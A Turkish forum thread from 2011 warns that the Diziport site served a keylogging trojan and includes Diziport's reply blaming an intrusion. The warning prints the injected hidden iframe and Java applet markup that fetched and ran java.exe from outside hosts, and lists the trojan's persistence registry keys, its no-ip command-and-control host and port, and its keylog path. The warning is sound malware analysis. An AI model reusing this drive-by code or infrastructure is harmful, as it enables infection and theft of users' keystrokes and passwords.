Yazıklar olsun Diziport... Dikkat edin bu siteye...
iDoFrM.oRG | iDoFoRuM | Efsaneler Ölmez Sadece Şekil Değiştirir

  • Ana Sayfa
  • Oyun Parkı
  • Fotoğraf Albümü
  • Forum Kuralları

Yazıklar olsun Diziport... Dikkat edin bu siteye...

Eleştiri -Yorum icinde Yazıklar olsun Diziport... Dikkat edin bu siteye... konusu , windows bilgisayarlarda cok yuksek ihtimalle (edit: dogrulandi!) bir virus calistiran bir sitedir. evet, arka planda bilgisayariniza kurduklari programla klavyeden bastiginiz her tusu (sifreler, mesajlar, vb.) bir dosyaya kaydedip o dosyayi …

Geri Git   iDoFrM.oRG | iDoFoRuM | Efsaneler Ölmez Sadece Şekil Değiştirir > Sizden Bizden İçimizden Her şey.. > Eleştiri -Yorum
Eski 08.11.11, 18:37   #1
Standart Yazıklar olsun Diziport... Dikkat edin bu siteye...

windows bilgisayarlarda cok yuksek ihtimalle (edit: dogrulandi!) bir virus calistiran bir sitedir. evet, arka planda bilgisayariniza kurduklari programla klavyeden bastiginiz her tusu (sifreler, mesajlar, vb.) bir dosyaya kaydedip o dosyayi baskasina (!) yolluyor. (bkz: keylogger) (bkz: şeref yoksunlugu)

(cok uzun lan bu, okumam diyenlere ozet: diziport, java applet'ler araciligiyla baska bir siteden keylogger programi indirip onu calistiriyor)

bundan sonrasi teknik aciklama, nasil bir sey yaptiklarini birlikte gorelim. sitenin kaynak kodunda,

--- kod 1---
<a href="http://twitter.com/diziport" title="" style="font-size:12px;"><iframe name="java" src="www.metinozdogan.com.tr/java/" width="1" height="1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"></iframe></a>
--- kod 1 ---

seklinde bir satir var. bunun yaptigi sey, siz sitenizi acinca tarayicida gorunmeyen bir pencerede metin ozdogan'in sitesinden (evet adini da yazalim da ne numaralar cevrildigi belli olsun) kodda gorulen sayfayi cagiriyor. (bkz: iframe)

peki bu sayfada ne var? "www.metinozdogan.com.tr/java/client.jar" seklinde bir java applet'i yukleyen bir kod. (dosya silinmis ama entry'nin devaminda butun bu dosyalar indirilebilir)

--- kod 2 ---
<applet code='javaupdater.class' width='1' height='1' archive='www.metinozdogan.com.tr/java/client.jar'>
<param name="url" value="www.medyaturk24.com/java/java.exe" />
</applet>
--- kod 2 ---

peki bu client.jar'in icinde ne var diyorsaniz, indirip decompile edip gorelim. icinden javaupdater.class cikiyor. hatta bakin ne guzel, hazir yapilmisi var:

--- kod 3 ---
[Sadece Kayıtlı Üyeler Linkleri Görebilir. ]
--- kod 3 ---

peki bu java kodu ne yapiyor biraz aciklayacak olursak,

1) (windows bilgisayarlarda) c:\documents and settings\kullaniciadiniz\rundll32.exe seklinde, sistem dosyasi gibi gorunen ama aslinda sistem dosyasi olmayan bir dosya yaratiyor.

2) sonra kod 2'deki (bakin yukarda) url parametresinde yazan [Sadece Kayıtlı Üyeler Linkleri Görebilir. ] (tiklamayin) dosyasini bilgisayariniza indiriyor ve bu dosyayi iste o rundll32.exe'nin icine yazip bilgisayara koyuyor.

3) sonra da bu internetten indirdigi dosyayi bilgisayarinizda calistiriyor. (kod 3, satir 50).

[Sadece Kayıtlı Üyeler Linkleri Görebilir. ] adresine gittiginizde muhtemelen daha once kullandiklari virusleri (ya da ne haltsa artik?) bulabiliyorsunuz. (82.exe 83.exe 84.exe 85.exe java.exe)

olur da silinir diye, butun bu dosyalari (exe'ler, .class, jar) zipleyip [Sadece Kayıtlı Üyeler Linkleri Görebilir. ] adresine koydum. link expire olursa isteyen yazarlar mesaj atabilirler tekrar koyarim.

java.exe adiyla gorunen dosyanin ne yaptigini benden daha tecrubeli reverse engineer'lara birakiyorum. sanirim emrah beyazkaya ([Sadece Kayıtlı Üyeler Linkleri Görebilir. ]) (diziport'un sahibi) simdi bize bir aciklama borclu, kim bu metin ozdogan, ne bu medyaturk'ten cekilen java.exe ve neden insanlarin bilgisayarlarinda calistiriliyor.

saygilar.

~~~~~~~~~~~~~~~~~~~~~~~

devami unpacked adli sozluk yazarindan geliyor, helal olsun adam ugrasmis.

--- spoiler ---

java.exe sunlari yapiyor:

enigma protector isimli bir yazılımla uygulamayı şifreleyerek antivirüslerden kaçmaya çalışmış ama pek başarılı olamamış sağlam antivirüsler tanıyor hatta 2 kere şifreleme yapılmış. önce aspack isimli uygulama ile (ki asıl dosya bu). sonra onu temp klasörüne çıkarıp çalıştıracak dosyayı da enigma ile şifrelemiş.

bilgisayara uzaktan erişmeyi sağlayan bir trojan bu. tipik trojan hareketi olarak kendini varsayılan tarayıcı gibi gösteriyor processlerde. ayrıca tarayıcı kapanırsa diye yedek olarak svchost.exe'nin de içine giriyor.

kendini c:\?windows\?system32\?installdir\?nod.exe olarak kopyalıyor ve bunu bilgisayar başlangıcında açılacak şekilde ayarlıyor. bu büyük ihtimal uac etkin olan sistemlerde c:\users\user\appdata\roaming\nod.exe olur.

yine klasik trojan hareketi olarak registry'de local machine ve current user/software/microsoft/currentversion/run ve local machine/software/microsoft/?active setup/?installed components yerlerine yazarak yapıyor başlangıçta açılma ayarını. installed components altındaki keyi ?{8b51u067-e68s-ar02-qep7-i1l0440op7h3}

yalnız bu başlangıç bilgilerini trojan çalışırken silmek işe yaramaz. yeniler sürekli. önce nod.exe kaldırılmalı.

trojan sahibine ulaşmak için stapler4445.no-ip.org adresinden ip bilgisini alıyor. o dns adresi trojanın sahibinin bağlantısını açıp kapadığında falan değişen ip adresini güncel olarak tutuyor. işte trojan da o ip adresine bağlanıp sahibinin listesinde bağlanılabilir olarak görülüyor. kullandığı port 3361.

keylog bilgilerini yani bastığın her tuşun kaydedildiği dosya c:\documents and settings\user\application data\microsoft\windows\uwcuemzbapecg.dat burada tutuluyor bu vista ve üzerinde değişir tabi. c:\users\user\appdata\ içinde bir yerlerde olur. şu uwcuemzbapecg kısmı da bilgisayara göre değişebilir bir ihtimal.

--- spoiler ---

onemli not: buyuk ihtimal bu siteye windows makinayla girdiyseniz virus kapmissiniz demektir. guncel bir anti-virus tarayici program isinizi gorecektir. (bkz: avira) bilgisayariniza full tarama yapin mumkunse.

ekşisözlükten alıntıdır...
__________________
.
Önce insan olmayı bilmeli, insan!




  Alıntı ile Cevapla
Eski 08.11.11, 19:28   #2
Standart Cevap: Yazıklar olsun Diziport... Dikkat edin bu siteye...

Dizi Port'tan keylogger açıklaması:


Saygıdeğer diziport kullanıcıları,

05.11.2011-07.11.2011 tarihlerinde sitemize karşı düzenlenen saldırıda sunucularımızdan birine kötü niyetli kişilerce sızma olmuş, teknik birimimizce sızma engellenmiş problem düzeltilmiştir.

Bu talihsiz olayın böylesine özel bir günde gerçekleşmiş olması sebebiyle üzgün olduğumuzu belirtmek isteriz.

Bilindiği üzere diziport yıllardır her türlü saldırıya maruz kalmış, bunu sadık kullanıcı kitlesi sayesinde kısa zamanda çözüme ulaştırmıştır. diziport için çıkan asılsız iddialara karşı düşüncenizin, sadece bu günü değil, 4 yıllık geçmişimizi göz önünde bulundurarak değişmemesini temenni etmekteyiz.

Bilmenizi isteriz ki; diziport hiçbir zaman kullanıcıların özel hayatına ilişkin kişisel bilgilerin peşine düşmez ve böyle ahlaksız yollara ne sebeple olursa olsun başvurmaz. yaşadığımız bu sıkıntılı olayı istismar ederek bizlere karşı ağır ithamlarda bulunan, site yöneticilerini acımasızca eleştiren/suçlayan kişiler bilmelidir ki, karşılık beklemeden hizmet eden bu site ne geçmişte ne de bugün yüz kızartıcı bir olaya bulaşmamıştır, bulaşmayacaktır.

Bilinmelidir ki, internet ortamında bu tür saldırılara her site maruz kalabilmektedir. kullanıcılarımızdan ricamız, herhangi bir bilgi sızmasını önlemek ve zarar görmemek için kullandığınız güvenlik yazılımlarının güncel olmasına dikkat etmenizdir.

Son olarak, bu olayın sorumluları hakkında gerekli işlemleri başlatmış olduğumuzu tüm kullanıcılarımıza duyurmak isteriz.

Saygılarımızla
Hayırlı bayramlar
__________________
.





.
  Alıntı ile Cevapla
Eski 08.11.11, 20:11   #3
Standart Cevap: Yazıklar olsun Diziport... Dikkat edin bu siteye...

gereken açıklama yapılmış. bu fark edilmese böyle devam edilecekti demek ki. diziport'a güvenim kalmadı benim şahıs olarak.
  Alıntı ile Cevapla
Eski 08.11.11, 20:14   #4
Standart Cevap: Yazıklar olsun Diziport... Dikkat edin bu siteye...

Diziport'la hiç işim olmazdı ama dün bir şeye bakmak için girmiştim. İnşallah bir şey olmamıştır
  Alıntı ile Cevapla
Cevapla

İşaretlemeler

Seçenekler

Yetkileriniz
Yeni konular gönderemezsiniz
Mesajlara cevap yazamazsınız
Mesajınıza eklentiler ekleyemezsiniz
Mesajlarınızı düzenleyemezsiniz

BB Kodu açık
[IMG] Kodu açık
HTML-Kodu kapalı
Trackbacks are açık
Pingbacks are açık
Refbacks are açık


isminiz@idofrm.org
MSN Adresi İçin Tıkla

Tüm Zamanlar GMT +3 Olarak Ayarlı. Şuanki Zaman: 01:16.

idoforum isminden de anlaşılacağı üzere bir forum sitesidir ve siteye gönderilen tüm mesajlar onaydan geçmeksizin anında paylaşılmaktadır. idoForum yönetimi yazılan mesajlardan sorumlu değildir, tüm sorumluluk mesajı yazan kişilere aittir. Yasalara aykırı bulduğunuz mesajları linkleriyle beraber admin@idofrm.org adresine bildirebilirsiniz. Şikayetiniz en kısa sürede incelemeye alınacaktır..
For English: Please let us know any illegal activity to admin@idofrm.org
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.5.1 PL1
Alexa Toolbar iGoogle
sayaç